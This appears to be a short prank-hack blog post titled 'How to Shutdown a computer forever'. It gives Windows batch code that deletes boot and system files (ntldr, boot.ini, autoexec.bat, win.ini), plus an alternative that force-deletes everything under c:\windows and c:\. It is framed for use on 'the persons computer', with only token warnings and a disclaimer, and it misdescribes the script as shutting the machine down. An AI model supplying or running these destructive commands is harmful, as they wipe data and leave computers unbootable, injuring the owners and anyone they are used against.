HOW TO SHUTDOWN A COMPUTER FOREVER


 How to Shutdown a computer forever



Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following 

code into your notepad 

@echo off
  
attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.iniSave it as “shutdown-

forever.bat”. Just make sure it

has a .bat or .cmd extension.

DONT RUN THE BATCH FILE ,YOU

WONT RECOVER BACK AFTER YOU

RUN IT !!!

This should shutdown the persons computer. It shuts it off once

and deletes the files needed to reboot and restart.So please, use

this hack only if you have no intention of rebooting your computer again. So just be careful.

Here’s an alternative code.

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

Paste it in NotePad And Save It

with Extension .cmd or .bat.

 ==================================================================
===================================================================

NOTE: Try at your own risk

WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…


ENJOY! Keep visiting !!! keep Enjoying!!!!

Thanks to : Mr Tricks <- ->


Your comments are most welcome. kindly leave them below.........

No comments: